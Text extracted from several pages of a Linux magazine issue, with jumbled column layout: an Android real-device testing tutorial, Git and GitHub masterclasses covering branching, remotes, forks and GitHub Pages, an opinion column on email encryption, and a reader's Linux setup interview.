  very convenient, and for most development, it’s the       android:label=”@string/app_name” within the             tail -f /var/log/syslog on the command line and
  best way to test your code. But there’s no substitute     application element, but this isn’t necessary with      plugging in your phone. You should see a line
  for running your project on a real device as soon as      Android Studio, as you can switch to debug mode         similar to ‘New USB device found, idVendor=18d1,
  possible, or even better, on a variety of real devices.   dynamically without having to add the line first. The   idProduct=4ee2’, which is what we see when we
  There are several good reasons for this. The most         next step is to put your Android device into            connect our Nexus 5. Extract the idVendor value
  important is usability, because unless you’re             development mode. On Android 4.0 and 4.1, this          and place this into the configuration file.
  running Android Studio on a touchscreen laptop,           option can be found in the Settings> Developer             When you connect your Android device, the
  you’ll only be able to interact with the emulator         Options page. But with more recent versions, the        device itself will ask whether you want to allow USB
  through your mouse. Your user, on the other hand, is      option has been obfuscated. Just go to Settings >       debugging and to accept a RSA fingerprint that
  only going to interact with your work through their       About Phone and tap 7 times on the Build Number         identifies your development PC. You need to accept
  fingers, so it’s important to make sure things are        field at the bottom of the list. As you approach the    this, and for convenience, we’d suggest also
  working in the way you expected them to.                  7th tap, you’ll see a pop-text message say you’re so    enabling the ‘Always Allow From This Computer’
     Secondly, real hardware can raise bugs or issues       many taps from being a developer, before the last       option too. If you want to make sure your device
  that aren’t apparent in the emulator. This might be       tap saying ‘You are now a developer’. ‘Developer        has been detected correctly, type the following:
  because of different versions of the operating            options’ will now be visible on the previous setting    /usr/share/android-studio/data/sdk/platform-tools/
  system, but it could equally be because of other          screen, and you need to enable ‘USB debugging’          adb devices
  applications running alongside, or user-specific          and accept the caveat that appears.                        The output should include the serial number of
  Android alternations that affect your application.            The next step will depend on your distribution.     your Android unit, followed by the word ‘device’. If it
     Finally, there’s performance. The emulator gives       With a recent Ubuntu derivative (we’re using Mint       says ‘unauthorized’, this means you’ve not accepted
  zero indication of how your app might perform, and        16) you can skip this and simply connect your           the RSA key on the device. Otherwise, you’re ready
  CPU and graphics constraints aren’t the only              Android device directly. Older versions or other        to go. When you next run your app from Android
  considerations. Bandwidth is vital, especially with       distributions may need to add a udev rule. To do        Studio, the device choice should list your external
  our project, and you need to be sure you’re not           this, type sudo nano /etc/udev/rules.d/51-android.      device, just as it does instances launched from the
  asking too much of a cellular data connection, or         rules and add the following line:                       emulator, and you’ll be able to select this as a
  that your application can fail gracefully if it loses     SUBSYSTEM==”usb”, ATTR{idVendor}==”18d1”,               destination for your app and choose to always use
  the connection or doesn’t have enough speed.              MODE=”0666”, GROUP=”plugdev”                            this device. Clicking on ‘OK’ will launch the app on
     The official Android documentation asks that you         You will need to change the idVendor                  your device in exactly the same way it does from
  add android:debuggable=”true” to your                     hexadecimal value to the one that matches your          the emulator.




                                                                         www.linuxvoice.com                                                                               109
      MASTERCLASS GIT




                             MASTERCLASS
                             Essential Linux tools explained – this month, the Git
  BEN EVERARD                version control system and its cloud-based cousin GitHub


GIT: VERSION CONTROL
Saved a file and changed your mind? Fear not, Git has your back...


                             G
                                   it is something that, as a Linux user, you’ll              Cloning is one way to get a repository. The other
       JOHN LANE                   come into contact with sooner or later. If you’re        way is to start a new one. Let’s say you have a project
                                   compiling a package from its source code                 that you’re working on and you have all its files in a
                             (perhaps after reading this issue’s compiling tutorial         myproject directory. Git calls this your working copy,
                             on page 86), for instance, you may well have to use a          because those are the files you work on as you
                             command like this:                                             develop your project. To track your project with Git,
                             $ git clone https://git.kernel.org/pub/scm/linux/kernel/git/   you first need to initialise your new repository in its
                             torvalds/linux.git                                             root directory:
      PRO TIP
                                This gets you the source code of the Linux kernel.          $ cd ~/myproject
 Git commands are well
 documented: use man or      And that is where the Git story begins – Linus                 $ git init
 give the --help option to   Torvalds created Git to hold the Linux kernel sources.         Initialized empty Git repository in /home/john/myproject
 any Git command. List all   But our one-line example doesn’t only get the latest             Git works by taking snapshots, called commits, of
 commands with
 git --help.                 version: you get the entire history too. Git is a version      the files in your working copy. You control what should
                             control system (VCS) that tracks changes to files and          be included in each commit. Git maintains an index of
                             can reproduce a project’s state as it was at any point         the files in your working copy that you wish to commit
                             in time. You can use it for your own projects too,             and you add files to this index. Adding files to the
                             giving you the ability to time-travel into its history or      index is called staging.
                             revert changes that you later wish you hadn’t made.              After initialising a new repository, it’s customary to
                                Git stores files in a repository. This is the working       commit all files so that they are tracked:
                             copy of a project (its directory hierarchy of files) plus a    $ git add .
The git status command       hidden directory where Git efficiently stores the              $ git commit -m “initial commit”
shows what is staged for
                             project’s history. In contrast to earlier version control      The first command adds everything within and
the next commit. The
                             systems, Git has no central server. Instead, many              beneath the current directory to the index, and the
README file has both
staged and unstaged          people can clone a repository, each getting their own          second command commits them. Each commit
changes, and                 copy of everything. They each work in their own clone          requires a descriptive commit message. The -m
experimental.c is            and can sync theirs with others. For this reason, Git is       argument enables you to give this on the command
untracked.                   known as a distributed VCS.                                    line, otherwise Git will open your default editor for you
                                                                                            to provide one.
                                                                                               Each commit is a new snapshot of your project
                                                                                            that’s made from the snapshot made for the previous
                                                                                            commit plus whatever is in the index when the
                                                                                            commit is done. Therefore each commit records a
                                                                                            snapshot of your project as it was at that point in time
                                                                                            (don’t worry – it does this very efficiently). Committing
                                                                                            empties the index, so any future changes need to be
                                                                                            added to the index again. This action is called staging,
                                                                                            and it enables you to control, per-commit, which
                                                                                            changes are included. Staging is also done with git
                                                                                            add. You can specify a single file or use wildcards
                                                                                            $ git add hello.c
                                                                                            $ git add *.c
                                                                                                When you stage a file, Git takes a snapshot of it, and
                                                                                            it is this snapshot that you later commit. If you change



110                                                               www.linuxvoice.com
                                                                                                                   GIT MASTERCLASS


a staged file before committing it and want those          number of ways to do this. The simplest of these
changes included, you must stage it again (using git       runs on the command line and uses ASCII-art to
add again).                                                represent commits.
   One extremely useful command is git status. It          $ git log --graph
shows at a glance the staged files that will be included     But this can be improved upon with Git’s instant
in the next commit and any tracked files with              web server. Start it in your project’s root directory (it
unstaged changes that won’t be included. It also           requires the lighttpd web server, or you can use
shows you any files in the working copy that are           --httpd to specify another server):
untracked. Staged files that are changed before            $ git instaweb
committing will show twice: as a file to be committed        It should open a browser window for you, or you
and also as one with unstaged changes.                     can navigate to http://localhost:1234. Better still is
   Each commit is given a unique reference: a SHA1         the repository browser: just enter gitk to open it.
hash of its contents, which you can see with git log.
Any commit can be recovered using its SHA1                 You are not alone
(actually, you don’t need to use all of it – just enough   So far you’ve been working in your own repository, but
characters to make it unique). These can still be          you may want to share work if you’re collaborating
difficult to remember though, so Git has another kind      with others. Git enables you to fetch from and push to
of reference – the branch.                                 other repositories. First, you need to tell it where these
                                                           remote repositories are:
Branching out                                              $ git remote add name URL
                                                                                                                            PRO TIP
A branch is the list of commits from the latest right        The name can be anything that describes the
                                                                                                                        List any files or directories
back to the initial commit made when the repository        remote – perhaps a colleague’s name. The URL                 that you don’t want
was created. New commits are added to the top, or          describes how to access it and Git supports various          tracked in a file called
HEAD, of the current branch.                               protocols including HTTP, HTTPS, its own “git”               .gitignore and Git will
                                                                                                                        ignore them.
   The output of git status shows the name of the          protocol, direct file access to the local filesystem and
current branch, and new repositories have a single         SSH. The latter offers authentication and is usually
branch called master. You would typically create a         required when pushing changes to a remote.
new branch for a specific piece of work and merge it         If your repository is a clone of another it will already
into the master branch once it’s complete. This avoids     have a remote (referred to as its origin) pointing to
polluting your master with incomplete changes and          where it was cloned from. Pushing changes to it
unwanted changes can be easily abandoned.                  would be done like this:
   Branches deviate from the commit where they are         $ git push origin master
made in a tree-like fashion, and commits on one
branch do not impact others unless merged. You can
                                                              You can fetch from a
                                                           remote and this gives
                                                                                         “If you’re working with others,
switch between branches with git checkout – useful         you remote branches           Git enables you to fetch from
if you’re working on multiple unrelated changes at the
same time, or you can use the -b option to check out
                                                           that you can list. Remote
                                                           branches are distinct
                                                                                         and push to other repositories.”
a new branch from the head of the current branch.          from your local branches.
$ git checkout -b mybranch                                 $ git fetch myremote
Switched to a new branch ‘mybranch’                        $ git branch -r
  You can list all branches and see the current              After fetching a remote, you can merge a remote
branch, marked with an asterisk:                           branch into your current one:
$ git branch                                               $ git merge myremote/branch
  master                                                   This is a common task and Git provides a shortcut for
* mybranch                                                 it. Another way to achieve a fetch and merge is to pull:
  myotherbranch                                            $ git pull myremote branch                                       PRO TIP
and check out whichever one you want                                                                                    Git branches are unlike
                                                                                                                        other VCS – nothing
$ git checkout master                                      First among equals                                           needs to be copied and
Switched to branch ‘master’                                We said that all repository clones are equal, but you        this makes them fast and
  To merge another branch into your current one:           can still treat one as the master copy and have people       lightweight.
$ git merge mybranch                                       clone that and push their changes to it. It’s common
and to delete a branch after merging (or if it’s           to locate such a repo on a server that is backed up,
unwanted):                                                 perhaps in the cloud to make it accessible. There are
$ git branch -d mybranch                                   many options here -- consider Gitolite, Gitorious or
  When you check out, Git replaces what’s in your          CGit on your own server or use a cloud service like
working copy with what was there at the time of the        Bitbucket, Sourceforge or the one we’ll explore next:
commit you check out.                                      GitHub.
  As you commit, branch and merge, it can be useful          The Pro Git book is an excellent resource, and you
to visualise your project’s commit tree, and there are a   can read it online for free at http://git-scm.com/book.



                                                             www.linuxvoice.com                                                                   111
      MASTERCLASS GITHUB



GITHUB: GIT IN THE CLOUDS
Publicise your project, take a free backup and other nice things. All with GitHub…


                              G
                                      itHub is probably the world’s largest code host.
                                      It enables you to host publicly-accessible Git
                                      repositories as well as, for a monthly fee,
                              private ones. Many open-source projects use GitHub
                              as their online presence.
                                 Read access to public repositories is free and does
                              not require registration, and many open-source
                              projects offer the GitHub URL of their repository,
                              which can be cloned without ever using the GitHub
                              website. But if you do this you’d be missing out, as the
                              website is a great way to browse repositories – it has
      PRO TIP                 an intuitive interface and nice features like syntax
 You can use GitHub-          highlighting of source code.
 flavoured Markdown (bit.        You need a GitHub account to host your own work.
 ly/13jiaLV) to format your
                              If you don’t have one then head over to github.com,
 comments on issues and
 pull requests.               choose a username and sign up. Then you can create
                              a repository. You then need to choose a name specific
                              to your account, and can enter a longer description if
                              you want to. Next, you choose whether the new
                              repository is private, which incurs fees, or public.
                                 There are a few other options that you can select.
                              You can initialise the new repository with README
                              and .gitignore files, and you can also choose an
                              open-source licence file. If you have already initialised
                              a repository locally (with git init) then you should leave
                              the GitHub one empty, because you will set it up as a
                              remote and push to it.
                                 GitHub then presents you with the exact
                              commands needed to create a new repository or                Browse repositories on GitHub with syntax highlighting
                              configure an existing one so that you can push it up to
                              GitHub. Continuing our conceptual myproject                  $ git push -u origin master
                              example, we would add GitHub as a remote:                      The -u argument tells Git to remember that origin/
                              cd ~/myproject                                               master is the remote, or upstream branch, which the
                              $ git remote add origin https://github.com/myusername/       local branch pushes to. It allows future pushes to omit
                              myproject.git                                                the remote details:
                                                                                           $ git push
                                                                                             You’ll be prompted for your GitHub username and
                                                                                           password each time you push, but you can avoid this
                                                                                           by using SSH instead of HTTP. You’ll need to add your
                                                                                           SSH public key to your GitHub account – click the
                                                                                           tools icon on the top right-hand corner of the page, go
                                                                                           to SSH Keys and paste in the text of your public key.
                                                                                           You can then change the remote’s URL from HTTP to
                                                                                           SSH like this:
                                                                                           $ git remote set-url origin git@github.com:myusername/
                                                                                           myproject.git


                                                                                           Fork and pull
                                                                                           You can quite happily get along using GitHub as a
                                                                                           remote repository for your work, allowing you to share
                                                                                           it with the world or even just as a backup (bear in
GitHub’s Wiki editor                                                                       mind that anyone can view fee-free repositories).
supports many kinds of                                                                     However, there is much more on offer. If you want to
markup                                                                                     contribute to a repository that is not your own, you



112                                                              www.linuxvoice.com
                                                                                                                   GITHUB MASTERCLASS

can fork it. This gives you your own copy of that                                                                              If you don’t want to write
repository that you can then clone to your local                                                                               your own pages by hand,
machine and make those great changes that you                                                                                  you can use GitHub’s
                                                                                                                               automatic page generator.
have in mind without disturbing anyone else. To fork
                                                                                                                               This offers a number of
another repository, first locate it using the search tool,                                                                     themes and an editor that
then just click the fork icon.                                                                                                 can get you published
  When you want to share those changes, you issue a                                                                            quickly.
pull request. This sends a formatted patch to the
owner of the repository that you forked. It is then up to
them to review and accept your patch. You first
commit your local changes and push them to your
local fork on GitHub. Then, on the GitHub screen for
that repository, click on Pull Request to generate a
patch and send the pull request. Anyone can leave
comments on a pull request and this offers a good
way to discuss it prior to it being accepted.

Wiki pages                                                        the root directory of your gh-pages branch. Put your
GitHub includes a wiki system called Gollum, which                domain in this file:
provides wiki pages on every repository. You decide               myproject.mydomain.co.uk
whether to have one and you can apply some limited                   You will also need to configure your domains DNS,
editing controls. There’s a comprehensive editor right            and you can read more about this at http://bit.ly/
there on the site or you can clone your wiki to your              ghdomain.
own machine and work locally:                                        Each repo also has an issues page, where anyone
$ git clone git@github.com:myusername/myproject.wiki              can log issues against it. Similarly to pull requests,
    Gollum supports quite a few markup syntaxes, so if            anyone can comment on issues. Posts can be given
                                                                                                                                    PRO TIP
Markdown isn’t your thing, you could try one of several           labels like bug, enhancement or question. You can,
                                                                                                                                You can clone GitHub’s
others on offer including MediaWiki, RDoc and                     however, disable a repository’s issues tracker on its         wiki system and use it
ReStructuredText.                                                 settings page. Some projects do this because they             yourself: https://github.
    The wiki is one way to provide content for your               prefer to receive pull requests.                              com/gollum.
repository, but there is another called GitHub Pages,                In addition to repository sites (Project Pages as
which enables you to add a static website to your                 GitHub calls them), you can have User Pages too.
repository. You can include content by adding a                   They work in exactly the same way, but you need to
branch named gh-pages and committing content to                   create a repository called myusername.github.io and
it. With your repository in a clean state (git status             store your content in its master branch. User pages
reports “nothing to commit, working directory clean”):            are served at http://mysername.github.io. You should
$ git checkout --orphan gh-pages                                  note that GitHub Pages
$ git rm -rf .
  This checks out a new empty branch that is
                                                                  are served over HTTP, so
                                                                  are not suited to sensitive
                                                                                                “If you want to contribute to a
unrelated to your existing commits, which makes                   information.                  repository that is not your own,
sense because it will contain unrelated content. You
need to clean out the working copy yourself, however,             Get the Gist
                                                                                                you can fork it.”
before starting to write your site’s content – perhaps            And, if all that weren’t
beginning with a new index.html file. To upload it,               enough, GitHub also provides a pastebin service,
commit and push to a new remote branch:                           called Gist, which is a way to quickly share snippets of
$ git commit -m “first commit of site pages”                      code and other pastes. Once again, you can use
$ git push -u origin gh-pages                                     Markdown and it also has syntax highlighting. Gists
  When the gh-pages branch is in place, GitHub will               are themselves Git repositories and can therefore be
publish it automatically and it should be accessible              cloned (the required URL is presented on the gist’s
within a few minutes. The repository’s settings will              page). As a GitHub user, you automatically have a gist
show the site’s address, which will be something like             site at gist.github.com/myusername, or you can click
http://myusername.github.io/myproject. You can                    the link at the top of your GitHub page.
even use your own domain by writing a CNAME file in                  If you have your own projects, no matter how small,
                                                                  GitHub is a handy addition to your toolkit, especially if
  Also consider                                                   you’re already a Git user. If you aren’t, GitHub makes it
                                                                  easier to become one.
  There are alternatives to GitHub. You might want to check out
  Gitorious or GitLab; both offer hosted services similar to
  GitHub but release open-source community editions that           John Lane is a technology consultant with a penchant for
                                                                   Linux. He helps new businesses start-ups make the most of
  offer the option of installing on your own server.
                                                                   open source software.




                                                                    www.linuxvoice.com                                                                      113
      /DEV/RANDOM/




Final thoughts, musings and reflections
                          Nick Veitch
                          was the original editor
                          of Linux Format, a
                                                                                          Computer parts
                          role he played until he
                          got bored and went                   Some screens
                          to work at Canonical
                          instead. Splitter!

                                                                                           Sound system




I
     n the olden days, things were better. Or                                                                      Embedded system and
                                                                                                                   electronic workbench
     maybe safer. At least when it came to
     communications. When transmitting
messages to his commanders, his senatorial
chums or whomever he needed to contact,
Julius Caesar used a simple alphabetical shift
system (still known as a Caesar cipher) to render
his messages unintelligible to whomever was
the latter-day equivalent to the NSA. It was
                                                                    Logitech G510
presumably pretty effective, mainly because                         with a lot of         Fully functional stack of
most of the people who may have intercepted                         extra keys            motherboards and laptops
                                                                                          with PXE boot (used as
the traffic didn’t even know what language it                                             compile cluster or test PC)
might have been in, and were probably not very
literate anyhow.
   These days, prying eyes don’t have to intercept

                                                      My Linux setup Emmanuel Lepage Vallée
a horseman riding through the treacherous
high-alps – they have computers. Since the very
first electronic computer was invented
specifically for decrypting messages (very            Awesome window manager developer, KDE contributor and
successfully), it is a safe bet that they are a bit   Free Software consultant http://awesome.naquadah.org
better at doing it now the average desktop has
10 billion times the power . Encrypting messages           What version of Linux are you            version of KDE in fall of 2000. As for my
securely is probably more important than ever.             using at the moment?                     first true Linux desktop, it was the first few
   Google recently took a pop at other mail                I have been using Gentoo since           versions of MEPIS, then Debian, Fedora
providers (notably Outlook.com, the artists                2005 – I never looked back. I also       Core and finally Gentoo.
formerly known as Hotmail) for failing to turn on     use Debian on my laptops.
TLS encryption for its users by default (a system                                                          What Free Software/open source
where mail providers encrypt the traffic between            What desktop or window                         can’t you live without?
their servers). It is most admirable that Google is         manager are you using?                         Tiled window managers - they make
so concerned for your privacy.                              My own. It is based on the                     my work so much more efficient. I
   I muttered to myself that they would never go            Awesome window manager                  started with DWM then moved to
so far as to implement PGP on Gmail. But              framework with a fully custom user            Awesome in early 2008. KDE software
apparently I was wrong.                               experience (https://github.com/Elv13 to       such as Dolphin, Kate and Okular would
   End-to-end encryption should mean that             cherry pick some of my own work).             also rate high on my list.
Google itself won’t be able to spy on your email,
by rummaging through it and looking for things              What was the first Linux setup                  What do other people love but
to sell you – or who knows what else it does with           you ever used?                                  you can’t get on with?
the data. The cynical side of me can’t wait to see          Technically (in Unix terms) that                Minimalism.
exactly how this gets implemented.                          would be Solaris and an early



114                                                          www.linuxvoice.com
A quick reference to Nethack commands




            AGPLv3, created by Shiar at http://sheet.shiar.nl/nethack